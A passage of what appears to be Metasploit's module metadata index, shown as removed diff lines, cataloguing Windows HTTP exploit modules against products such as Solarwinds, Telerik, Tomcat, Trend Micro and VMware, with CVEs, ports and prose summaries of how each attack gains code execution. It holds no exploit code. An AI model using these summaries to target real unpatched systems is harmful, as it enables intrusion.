Refer to the module documentation for more details.", - "references": [ - "CVE-2022-1373", - "CVE-2022-2334", - "ZDI-22-1154", - "ZDI-22-1156", - "URL-https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html", - "URL-https://ide0x90.github.io/softing-sis-122-rce/" - ], - "platform": "Windows", - "arch": "x64", - "rport": 8099, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows x64" - ], - "mod_time": "2024-04-19 23:05:02 +0000", - "path": "/modules/exploits/windows/http/softing_sis_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/softing_sis_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/solarwinds_fsm_userlogin": { - "name": "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability", - "fullname": "exploit/windows/http/solarwinds_fsm_userlogin", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-03-13", - "type": "exploit", - "author": [ - "rgod", - "mr_me ", - "sinn3r " - ], - "description": "This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager\n 6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface\n due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set\n the 'username' attribute before authentication. 
The second problem is that the settings-new.jsp\n file will only check the 'username' attribute before authorizing the 'uploadFile' action,\n which can be exploited and allows the attacker to upload a fake xls host list file to the\n server, and results in arbitrary code execution under the context of SYSTEM.\n\n Depending on the installation, by default the Change Advisor web server is listening on port\n 48080 for an express install. Otherwise, this service may appear on port 8080.\n\n Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip, noted in the\n references for this module.", - "references": [ - "CVE-2015-2284", - "OSVDB-81634", - "ZDI-15-107", - "URL-http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip" - ], - "platform": "Windows", - "arch": "", - "rport": 48080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Solarwinds Firewall Security Manager 6.6.5" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb", - "is_install_path": true, - "ref_name": "windows/http/solarwinds_fsm_userlogin", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/solarwinds_storage_manager_sql": { - "name": "Solarwinds Storage Manager 5.1.0 SQL Injection", - "fullname": "exploit/windows/http/solarwinds_storage_manager_sql", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-12-07", - "type": "exploit", - "author": [ - "r ", - "muts", - "sinn3r " - ], - "description": "This module exploits a SQL injection found in Solarwinds Storage Manager\n login interface. 
It will send a malicious SQL query to create a JSP file\n under the web root directory, and then let it download and execute our malicious\n executable under the context of SYSTEM.", - "references": [ - "OSVDB-81634", - "EDB-18818", - "URL-http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html", - "URL-http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm" - ], - "platform": "Windows", - "arch": "", - "rport": 9000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Universal" - ], - "mod_time": "2021-02-18 09:18:19 +0000", - "path": "/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb", - "is_install_path": true, - "ref_name": "windows/http/solarwinds_storage_manager_sql", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/sonicwall_scrutinizer_sqli": { - "name": "Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection", - "fullname": "exploit/windows/http/sonicwall_scrutinizer_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-07-22", - "type": "exploit", - "author": [ - "muts", - "Devon Kearns", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Dell SonicWall Scrutinizer.\n While handling the 'q' parameter, the PHP application does not properly filter\n the user-supplied data, which can be manipulated to inject SQL commands, and\n then gain remote code execution. 
Please note that authentication is NOT needed\n to exploit this vulnerability.", - "references": [ - "CVE-2012-2962", - "OSVDB-84232", - "EDB-20033", - "BID-54625", - "URL-http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf" - ], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Dell SonicWall Scrutinizer 9.5.1 or older" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb", - "is_install_path": true, - "ref_name": "windows/http/sonicwall_scrutinizer_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ssrs_navcorrector_viewstate": { - "name": "SQL Server Reporting Services (SSRS) ViewState Deserialization", - "fullname": "exploit/windows/http/ssrs_navcorrector_viewstate", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-02-11", - "type": "exploit", - "author": [ - "Soroush Dalili", - "Spencer McIntyre" - ], - "description": "A vulnerability exists within Microsoft's SQL Server Reporting Services\n which can allow an attacker to craft an HTTP POST request with a\n serialized object to achieve remote code execution. 
The vulnerability is\n due to the fact that the serialized blob is not signed by the server.", - "references": [ - "CVE-2020-0618", - "URL-https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (x86)", - "Windows (x64)", - "Windows (cmd)" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb", - "is_install_path": true, - "ref_name": "windows/http/ssrs_navcorrector_viewstate", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/steamcast_useragent": { - "name": "Streamcast HTTP User-Agent Buffer Overflow", - "fullname": "exploit/windows/http/steamcast_useragent", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-01-24", - "type": "exploit", - "author": [ - "LSO ", - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Streamcast <= 0.9.75. 
By sending\n an overly long User-Agent in an HTTP GET request, an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2008-0550", - "OSVDB-42670", - "URL-http://aluigi.altervista.org/adv/steamcazz-adv.txt", - "BID-33898" - ], - "platform": "Windows", - "arch": "", - "rport": 8000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English All", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/steamcast_useragent.rb", - "is_install_path": true, - "ref_name": "windows/http/steamcast_useragent", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sws_connection_bof": { - "name": "Simple Web Server Connection Header Buffer Overflow", - "fullname": "exploit/windows/http/sws_connection_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-20", - "type": "exploit", - "author": [ - "mr.pr0n", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user\n can send a long string data in the Connection Header to causes an overflow on the\n stack when function vsprintf() is used, and gain arbitrary code execution. 
The\n module has been tested successfully on Windows 7 SP1 and Windows XP SP3.", - "references": [ - "OSVDB-84310", - "EDB-19937", - "URL-http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sws_connection_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/sws_connection_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sybase_easerver": { - "name": "Sybase EAServer 5.2 Remote Stack Buffer Overflow", - "fullname": "exploit/windows/http/sybase_easerver", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-07-25", - "type": "exploit", - "author": [ - "Unknown" - ], - "description": "This module exploits a stack buffer overflow in the Sybase EAServer Web\n Console. 
The offset to the SEH frame appears to change depending\n on what version of Java is in use by the remote server, making this\n exploit somewhat unreliable.", - "references": [ - "CVE-2005-2297", - "OSVDB-17996", - "BID-14287" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11", - "Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?", - "Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06", - "Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sybase_easerver.rb", - "is_install_path": true, - "ref_name": "windows/http/sybase_easerver", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/syncbreeze_bof": { - "name": "Sync Breeze Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/syncbreeze_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-03-15", - "type": "exploit", - "author": [ - "Daniel Teixeira", - "Andrew Smith", - "Owais Mehtab", - "Milton Valencia (wetw0rk)" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,\n and v10.1.16, caused by improper bounds checking of the request in\n HTTP GET and POST requests sent to the built-in web server. 
This\n module has been tested successfully on Windows 7 SP1 x86.", - "references": [ - "CVE-2017-14980" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Sync Breeze Enterprise v9.4.28", - "Sync Breeze Enterprise v10.0.28", - "Sync Breeze Enterprise v10.1.16" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/syncbreeze_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/syncbreeze_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sysax_create_folder": { - "name": "Sysax Multi Server 5.64 Create Folder Buffer Overflow", - "fullname": "exploit/windows/http/sysax_create_folder", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-29", - "type": "exploit", - "author": [ - "Craig Freyman", - "Matt \"hostess\" Andreko" - ], - "description": "This module exploits a stack buffer overflow in the create folder function in\n Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the\n vulnerability valid credentials with the create folder permission must be provided.\n The HTTP option must be enabled on Sysax too.\n\n This module will log into the server, get a SID token, find the root folder, and\n then proceed to exploit the server. 
Successful exploits result in SYSTEM access.\n This exploit works on XP SP3, and Server 2003 SP1-SP2.", - "references": [ - "CVE-2012-6530", - "OSVDB-82329", - "EDB-20676", - "EDB-18420", - "URL-http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html", - "URL-http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 / Sysax Multi Server 5.64", - "Windows 2003 SP1-SP2 / Sysax Multi Server 5.64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sysax_create_folder.rb", - "is_install_path": true, - "ref_name": "windows/http/sysax_create_folder", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/telerik_rau_deserialization": { - "name": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", - "fullname": "exploit/windows/http/telerik_rau_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-12-09", - "type": "exploit", - "author": [ - "Spencer McIntyre", - "Paul Taylor", - "Markus Wulftange", - "Caleb Gross", - "Alvaro Muñoz", - "Oleksandr Mirosh", - "straightblast" - ], - "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. 
It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').", - "references": [ - "CVE-2017-11317", - "URL-https://github.com/bao7uo/RAU_crypto", - "URL-https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload", - "URL-https://github.com/straightblast/UnRadAsyncUpload/wiki", - "CVE-2019-18935", - "URL-https://github.com/noperator/CVE-2019-18935", - "URL-https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization", - "URL-https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html", - "URL-https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows" - ], - "mod_time": "2021-02-24 20:24:57 +0000", - "path": "/modules/exploits/windows/http/telerik_rau_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/telerik_rau_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "unreliable-session" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/telerik_report_server_deserialization": { - "name": "Telerik Report Server Auth Bypass and Deserialization RCE", - "fullname": "exploit/windows/http/telerik_report_server_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-06-04", - "type": "exploit", - "author": [ - "SinSinology", - "Soroush Dalili", - "Unknown", - "Spencer McIntyre" - ], - "description": "This module chains an authentication bypass 
vulnerability (CVE-2024-4358) with a deserialization vulnerability\n (CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.\n The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.\n The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a\n new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an\n OS command as NT AUTHORITY\\SYSTEM. The module will automatically delete the created report but not the account\n because users are unable to delete themselves.", - "references": [ - "CVE-2024-1800", - "CVE-2024-4358", - "URL-https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 83, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2024-06-06 14:56:33 +0000", - "path": "/modules/exploits/windows/http/telerik_report_server_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/telerik_report_server_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ], - "RelatedModules": [ - "auxiliary/scanner/http/telerik_report_server_auth_bypass" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/tomcat_cgi_cmdlineargs": { - "name": "Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability", - "fullname": "exploit/windows/http/tomcat_cgi_cmdlineargs", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-04-10", - "type": "exploit", - "author": [ - "Yakov Shafranovich", - 
"sinn3r " - ], - "description": "This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the\n enableCmdLineArguments setting is set to true, a remote user can abuse this to execute\n system commands, and gain remote code execution.", - "references": [ - "CVE-2019-0232", - "URL-https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/", - "URL-https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Apache Tomcat 9.0 or prior for Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb", - "is_install_path": true, - "ref_name": "windows/http/tomcat_cgi_cmdlineargs", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/trackercam_phparg_overflow": { - "name": "TrackerCam PHP Argument Buffer Overflow", - "fullname": "exploit/windows/http/trackercam_phparg_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-02-18", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a simple stack buffer overflow in the\n TrackerCam web server. All current versions of this software\n are vulnerable to a large number of security issues. 
This\n module abuses the directory traversal flaw to gain\n information about the system and then uses the PHP overflow\n to execute arbitrary code.", - "references": [ - "CVE-2005-0478", - "OSVDB-13953", - "OSVDB-13955", - "BID-12592", - "URL-http://aluigi.altervista.org/adv/tcambof-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 8090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 English", - "Windows XP English SP0/SP1", - "Windows NT 4.0 SP4/SP5/SP6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/trackercam_phparg_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/trackercam_phparg_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/trackit_file_upload": { - "name": "Numara / BMC Track-It! FileStorageService Arbitrary File Upload", - "fullname": "exploit/windows/http/trackit_file_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-10-07", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!\n v8 to v11.X.\n The application exposes the FileStorageService .NET remoting service on port 9010\n (9004 for version 8) which accepts unauthenticated uploads. 
This can be abused by\n a malicious user to upload a ASP or ASPX file to the web root leading to arbitrary\n code execution as NETWORK SERVICE or SYSTEM.\n This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,\n 10.0.0.143, 9.0.30.248 and 8.0.2.51.", - "references": [ - "CVE-2014-4872", - "OSVDB-112741", - "US-CERT-VU-121036", - "URL-https://seclists.org/fulldisclosure/2014/Oct/34" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Numara / BMC Track-It! v9 to v11.X - Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/trackit_file_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/trackit_file_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/trendmicro_officescan": { - "name": "Trend Micro OfficeScan Remote Stack Buffer Overflow", - "fullname": "exploit/windows/http/trendmicro_officescan", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-06-28", - "type": "exploit", - "author": [ - "toto" - ], - "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n cgiChkMasterPwd.exe (running with SYSTEM privileges).", - "references": [ - "CVE-2008-1365", - "OSVDB-42499" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/trendmicro_officescan.rb", - "is_install_path": true, - "ref_name": "windows/http/trendmicro_officescan", - 
"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/trendmicro_officescan_widget_exec": { - "name": "Trend Micro OfficeScan Remote Code Execution", - "fullname": "exploit/windows/http/trendmicro_officescan_widget_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-10-07", - "type": "exploit", - "author": [ - "mr_me ", - "Mehmet Ince " - ], - "description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product\n has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which\n leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process\n does not properly validate a user-supplied string before using it to execute a system call. 
Due to combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.", - "references": [ - "CVE-2017-11394", - "URL-https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/", - "URL-http://www.zerodayinitiative.com/advisories/ZDI-17-521/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "OfficeScan 11", - "OfficeScan XG" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/trendmicro_officescan_widget_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/trendmicro_officescan_widget_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ultraminihttp_bof": { - "name": "Ultra Mini HTTPD Stack Buffer Overflow", - "fullname": "exploit/windows/http/ultraminihttp_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-10", - "type": "exploit", - "author": [ - "superkojiman", - "PsychoSpy ", - "OJ Reeves " - ], - "description": "This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21,\n allowing remote attackers to execute arbitrary code via a long resource name in an HTTP\n request. This exploit has to deal with the fact that the application's request handler\n thread is terminated after 60 seconds by a \"monitor\" thread. To do this, it allocates\n some RWX memory, copies the payload to it and creates another thread. 
When done, it\n terminates the current thread so that it doesn't crash and hence doesn't bring down\n the process with it.", - "references": [ - "OSVDB-95164", - "EDB-26739", - "CVE-2013-5019", - "BID-61130" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "v1.21 - Windows Server 2000", - "v1.21 - Windows XP SP0", - "v1.21 - Windows XP SP2/SP3", - "v1.21 - Windows Server 2003 (Enterprise)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ultraminihttp_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/ultraminihttp_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/umbraco_upload_aspx": { - "name": "Umbraco CMS Remote Command Execution", - "fullname": "exploit/windows/http/umbraco_upload_aspx", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-28", - "type": "exploit", - "author": [ - "Toby Clarke", - "juan vazquez " - ], - "description": "This module can be used to execute a payload on Umbraco CMS 4.7.0.378.\n The payload is uploaded as an ASPX script by sending a specially crafted\n SOAP request to codeEditorSave.asmx, which permits unauthorized file upload\n via the SaveDLRScript operation. SaveDLRScript is also subject to a path\n traversal vulnerability, allowing code to be placed into the web-accessible\n /umbraco/ directory.\n\n The module writes, executes and then overwrites an ASPX script; note that\n though the script content is removed, the file remains on the target. Automatic\n cleanup of the file is intended if a meterpreter payload is used.\n\n This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows\n 7 32-bit SP1. 
In this scenario, the \"IIS APPPOOL\\ASP.NET v4.0\" user must have\n write permissions on the Windows Temp folder.", - "references": [ - "OSVDB-83765", - "EDB-19671", - "URL-http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html", - "URL-http://umbraco.codeplex.com/workitem/18192" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1" - ], - "mod_time": "2019-08-02 09:48:53 +0000", - "path": "/modules/exploits/windows/http/umbraco_upload_aspx.rb", - "is_install_path": true, - "ref_name": "windows/http/umbraco_upload_aspx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/vmware_vcenter_chargeback_upload": { - "name": "VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload", - "fullname": "exploit/windows/http/vmware_vcenter_chargeback_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-05-15", - "type": "exploit", - "author": [ - "Andrea Micalizzi", - "juan vazquez " - ], - "description": "This module exploits a code execution flaw in VMware vCenter Chargeback Manager,\n where the ImageUploadServlet servlet allows unauthenticated file upload. 
The files\n are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed.\n The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1\n on Windows 2003 SP2.", - "references": [ - "CVE-2013-3520", - "OSVDB-94188", - "BID-60484", - "ZDI-13-147" - ], - "platform": "Windows", - "arch": "x86", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/vmware_vcenter_chargeback_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/vxsrchs_bof": { - "name": "VX Search Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/vxsrchs_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-03-15", - "type": "exploit", - "author": [ - "Daniel Teixeira" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of VX Search Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. 
